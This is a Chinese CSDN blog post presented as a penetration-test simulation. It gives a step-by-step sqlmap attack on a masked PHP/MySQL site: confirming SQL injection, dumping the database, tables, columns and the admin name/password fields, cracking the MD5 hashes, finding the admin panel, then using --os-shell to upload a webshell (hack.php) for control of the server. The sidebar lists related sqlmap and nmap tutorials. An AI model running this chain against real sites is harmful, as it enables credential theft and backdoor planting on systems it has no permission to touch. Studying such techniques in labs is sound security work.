渗透测试模拟(使用sqlmap进行sql注入漏洞判断,利用该漏洞进行挂马)

已于 2023-02-08 09:27:46 修改
阅读量1.8k 收藏 23
点赞数
分类专栏: 渗透测试 文章标签: sql 安全 web安全 Powered by 金山文档
于 2023-01-23 13:31:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57028135/article/details/128744001
版权
本文介绍了如何对PHP+MySQL网站进行渗透测试,利用sqlmap工具探测SQL注入漏洞,获取数据库信息,包括数据库名、表名、列名及字段数据。通过MD5解密获取密码,寻找后台地址,并利用sqlmap上传大马以获得操作系统级别的控制。
摘要由CSDN通过智能技术生成

环境:对某网站进行渗透测试。

(PHP+Mysql开发的网站,用于WEB漏洞教学和检测的)

工具:sqlmap(Kali Linux中自带or官网下载Windows版)

此次实验所涉及的sqlmap参数:

一、信息收集

二、漏洞挖掘

(1)判断网站是否存在sql注入漏洞

使用工具,sqlmap:sqlmap -u "目标网站地址" --batch

(2)存在 sql注入漏洞,

使用sqlmap进行sql注入,并获取后台管理员的账号和密码。

1、先跑出当前网站所使用的数据库库名

(sqlmap -u "http://*********/product.php?cid=4" --current-db)

当前数据库:’510cms‘。

2、求当前数据库下所有表名

(sqlmap -u "http://*************/product.php?cid=4" -D 510cms --tables)

3、求指定表内列名

(sqlmap -u "http://***********/product.php?cid=4" -D 510cms -T 510_admin --columns)

4、求指定列名的字段

(sqlmap -u "http://*********/product.php?cid=4" -D 510cms -T 510_admin -C name,passwd --dump)

三、获取账户密码后就可以登录网站后台()

(1)使用md5在线解密破解密码

获取弱口令

(2)找到后台地址就可以登录了
(3)如何获取网站后台地址(参考之前的一篇)

(223条消息) 渗透测试中的信息收集(使用相关工具,收集网站的子域名,扫描网站的后台地址)_net1996的博客-CSDN博客

四、攻击网站,利用sqlmap上传大马,可以对网站进行后台操作

(1)

(sqlmap -u "http://************/product.php?cid=4" --os-shell)

四个选项:

(2)进入如上网站,上传自己准备的大马(hack.php)
(3)上传成功后,在网站原址后加上/hack.php即可进入操作界面

(http://***********/hack.php)密码在大马文件中有。

net1996
关注
  • 0
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【面试复盘】奇安信 渗透测试(攻防类)一面
大河之犬的博客
06-07 1853
qax的面试官会详细和你说你的不足之处,也会说你的优点,团队主要是做打击国外apt组织的不足:对于红队攻击的手法没有其他人掌握的多,建议看看攻防社区,了解一下最前沿的攻击手段优点:代码能力不错,可以来我们团队做代码这一块的研究工作。
web安全攻防渗透测试实战指南
jhf223344的博客
04-05 9004
1. Nmap的基本 Nmap + ip 6+ ip Nmap -A 开启操作系统识别和版本识别功能 – T(0-6档) 设置扫描的速度 一般设置T4 过快容易被发现 -v 显示信息的级别,-vv显示更详细的信息 192.168.1.1/24 扫描C段 192.168.11 -254 =上 nmap -A -T4 -v -iL ~/targets.txt (iL表示要扫描的目标位于一个文档中) --------------- 192.168.1.1/24 --exclude 19...
爬虫结合SqlmapApi判断注入
Coisini的博客
06-05 973
最近在弄点蛋疼的东西.爬虫,扫描。扫描交给sqlmapapi来进行.现在的资料不是很多,但是还是可以找到一些 《使用sqlmapapi.py批量化扫描实践》http://drops.wooyun.org/tips/6653 看看他所封装的sqlmapapi的类 #!/usr/bin/python #-*-coding:utf-8-*- import requests import time im...
Web安全开发:SQL注入攻击和网页挂马
热门推荐
09-13 1万+
 申明。文章仅代表个人观点,与所在公司无任何联系。 1.     概述网页挂马这个话题想来大家并不陌生。为什么有这么多的网页上存在着木马去攻击普通用户?不可否认,相当一部分网页原本就是恶意的:网页的作者故意在上面放上木马,然后通过各种手段引诱用户去浏览。但是绝大多数被挂马的网页原本是正常的网页,例如普通的教育网站,购物网站等等,只是网页被攻击者恶意修改后插入了木马代码。那么,攻
模拟浏览器进行sql注入
最新发布
weixin_45631123的博客
07-29 240
笔者进行sqlmap盲注时,发现很多网站都有保护机制,要求cookie。根据目前网站的机制,通过模拟浏览器进行注入,可以绕i过一些保护机制。安装Selenium库。
sqlmap工具基本使用(检测sql注入
m0_37570494的博客
01-25 6240
sqlmap的用户手册: sqlmap是python2进行运行的,如果要直接使用,需要把sqlmap设置到环境变量中: sqlmap主要用于sql注入方面的异常检测 Mysql数据库 1、先检测是否可以注入,先判断是否可以正常注入: sqlmap -u url -v 3 里面有个注意的点url后面必须是可注入的参数?id=之类的,否则url检测会有问题 对于某些今天url可以在/a/b*.html尝试加入*号来进行此路径内的检测 2、爆库 sqlmap.py -u http://...
sqlmap工具使用详解及使用sqlmap检测SQL注入漏洞姿势
qq_67473072的博客
07-25 3275
sqlmap工具使用详解及使用sqlmap检测SQL注入漏洞姿势
SQL注入sqlmap入门教程_sqlmap注入
ewii12567的博客
04-10 642
原来sql注入如此简单以SQL注入靶场sqli-labs第一关为例,进行sqlmap工具的使用分享。
记对一网站(存在SQL注入漏洞渗透测试过程
DXfighting_的博客
04-14 806
网站sql注入漏洞利用
web安全攻防渗透测试实训笔记
m0_65385236的博客
04-07 1369
1. Nmap的基本 Nmap + ip 6+ ip Nmap -A 开启操作系统识别和版本识别功能 – T(0-6档) 设置扫描的速度 一般设置T4 过快容易被发现 -v 显示信息的级别,-vv显示更详细的信息 192.168.1.1/24 扫描C段 192.168.11 -254 =上 nmap -A -T4 -v -iL ~/targets.txt (iL表示要扫描的目标位于一个文档中) --------------- 192.168.1.1/24 ...
web安全攻防渗透测试笔记
m0_62309510的博客
04-06 1007
sqlmap (1) 安装sqlmap前,需要先安装Python3.X Python Releases for Windows | Python.org (2) 在环境变量path中,增加python3.x 安装路径 (3) 下载sqlmap并解压缩: 地址:sqlmap: automatic SQL injection and database takeover tool Python sqlmap.py -uhttp://xxx.xxx.xxx/ Pyt...
sqlmap入门-判断注入点
weixin_46626737的博客
11-14 7001
①找到目标站,查看源代码,或者查找子链接,寻找可以尝试注入的参数,大多为$POST['a'],也有$GET['a'],当中a为可尝试注入的参数 还有比如点击子链接url中出现http://www.*****.com/****.php?a=1 出现http://www.******.com/*****.php?a=1&b=a等等 ②get型的注入命令,基本为python sqlmap.py(换到相应路径) -u "url" --level 1-5 ③post型的注入命令给,可以用brup...
sqlmapsql注入原理利用
m0_55313512的博客
02-26 2403
SqlMap
SQL注入sqlmap入门教程
m0_56634355的博客
04-09 9162
sqlmapsql注入必备的也是最常用的工具,是每一位白帽子在的利器之一。
(亲测有效)关于sql注入漏洞的测试、发现以及sqlmap工具的使用
guijianchouxyz的博客
07-21 2926
(亲测有效)关于sql注入漏洞的测试以及发现,尝试了百篇文章总结出来的 今天单位突然说有个平台有sql注入漏洞,让找出来来是什么样的sql漏洞,真是nn腿了,只能用下面的这张图来代表自己的心情了 关于sql注入的几点想法 网上面有那么多的sqlmap工具的使用方法,前篇一律,都是看不懂 网上好多关于sql注入的视频也是看一遍懵逼一遍 使用了好多的方法,为什么人家的就可以咱的就不行的 浪费了时间,这个也不能花钱让别人做 废话少说,开干 第一步,安装sqlmap 既然要用到这个工具,那我们
sqlmap自动扫描注入点_简记——利用sqlmap检测网站sql注入漏洞获取数据
weixin_39834488的博客
11-26 1633
sqlmap是一个开源软件,用于检测和利用数据库漏洞,并提供了将恶意代码注入其中的选项。[1]它是一种渗透测试工具,可在终端中提供其用户界面,从而自动检测和利用SQL注入漏洞的过程。[2]该软件在命令行运行,可以下载用于不同的操作系统:Linux发行版,Windows和Mac OS操作系统。[3]除了映射和检测漏洞之外,该软件还可以访问数据库,编辑和删除数据以及查看表中的数据,例如用户,密码,备份...
SQLmap检测sql注入漏洞
weixin_30826095的博客
08-24 714
(1).SQL概念   所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。它是利用现有应用程序,可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库。比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击。例:123...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值